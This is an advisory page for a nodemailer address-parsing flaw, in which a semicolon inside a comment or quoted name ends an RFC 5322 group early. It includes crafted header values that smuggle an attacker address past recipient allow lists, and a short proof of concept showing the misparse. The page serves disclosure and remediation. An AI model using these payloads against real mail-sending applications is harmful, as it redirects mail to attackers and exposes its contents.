# GHSA-m943-m63m-w62w: Vulnerability summary addressparser ends an RFC 5322 group at the first `;`, including one inside a quoted display name or a comment.


- **Severity:** Not scored
- **Exploited in the wild:** Not known
- **Fix available:** Yes
- **Published:** 23 Oct 2026

## What is GHSA-m943-m63m-w62w?

GHSA-m943-m63m-w62w is a vulnerability in nodemailer, published on 23 Oct 2026. 

### Official description

### Vulnerability summary

addressparser ends an RFC 5322 group at the first `;`, including one inside a quoted display name or a comment. The text after it is parsed again as top level recipients with the quoting flipped, so text that every conformant parser reads as a display name or comment becomes a live address. `G: (a; <evil@evil.com>) <v@victim.com>;` names only `v@victim.com`, and Nodemailer read it as the single recipient `evil@evil.com`. Affected: 3.0.0 through 10.1.3.

### Attacker capabilities

The attacker controls the text of an address field that an application passes to Nodemailer, or the header of an inbound message parsed with mailparser. No access to the application, its configuration or its credentials is needed. The value is a syntactically valid RFC 5322 group that conformant parsers accept without defects.

### Realistic exploitation scenario

An application validates the recipients of a submitted address list with a conformant parser and only allows addresses at its own domain. The attacker submits `G: (a; <evil@evil.com>) <v@victim.com>;`. The validator sees one mailbox, `v@victim.com`, and approves it. Nodemailer delivers to `evil@evil.com` only. The same works through a quoted display name, `G: "a;" "<evil@evil.com>" <v@victim.com>;`. The boundary crossed is the application's recipient allow list.

### Proof of concept

```js
const addressparser = require('nodemailer/lib/addressparser');
console.log(addressparser("G: (a; <evil@evil.com>) <v@victim.com>;"));
// [ { name: 'G', group: [ [Object] ] }, { address: 'evil@evil.com', name: ') v@victim.com' } ]
```

Python's `email._header_value_parser.get_address_list` reads the same value as the single mailbox `v@victim.com`, with no defects reported.

The envelope a message gets is built from the same parse, so `sendMail({ to: "G: (a; <evil@evil.com>) <v@victim.com>;" })` issues the RCPT TO shown above.

### Security impact

Mail that an application intends for an approved recipient goes to a recipient chosen by the attacker, which discloses its content, and the intended recipient never receives it. The misreading only occurs on values a conformant validator approves, so correct validation is bypassed, which makes it a security issue rather than a parsing bug. Affected are applications that pass user influenced address lists to Nodemailer and consumers of the standalone parser such as mailparser.

The fix tracks quoted strings and comments inside a group and reads only a `;` outside them.

Found in an internal review of addressparser on 2026-10-18. Verified on 3.0.0, 6.9.16 and 10.1.3.

## Which versions are affected by GHSA-m943-m63m-w62w?

2 open source packages ship an affected version, including nodemailer.


| Package | Ecosystem | Affected | Fixed in |
| --- | --- | --- | --- |
| `nodemailer` | npm | From 3.0.0 | 10.1.4 |
| `nodemailer` | npm | From 3.0.0 | 10.1.4 |

## How do I fix GHSA-m943-m63m-w62w?

Upgrade nodemailer to 10.1.4 or later.

## Is GHSA-m943-m63m-w62w being exploited?

There is no known exploitation of GHSA-m943-m63m-w62w in the wild and no public exploit code.

## Fix prompt for AI coding agents

```text
Check this codebase for GHSA-m943-m63m-w62w and fix it if it is affected.

What it is: GHSA-m943-m63m-w62w is a vulnerability in nodemailer, published on 23 Oct 2026. 
Exploitation: There is no known exploitation of GHSA-m943-m63m-w62w in the wild and no public exploit code.

Affected packages and fixed versions:
- nodemailer (npm): affected from 3.0.0; fixed in 10.1.4
- nodemailer (npm): affected from 3.0.0; fixed in 10.1.4

Task:
1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.
2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.
3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.
4. Run the tests and summarise what changed and why.
5. If nothing in the project is affected, say so and change nothing.

Reference: https://insights.sbomify.com/GHSA-m943-m63m-w62w/ (Markdown: https://insights.sbomify.com/GHSA-m943-m63m-w62w/index.md)
```

## Sources

- OSV: https://osv.dev/vulnerability/GHSA-m943-m63m-w62w

---
From sbomify Insights: https://insights.sbomify.com/GHSA-m943-m63m-w62w/
Summaries are generated and may contain mistakes; the official description above is the record.
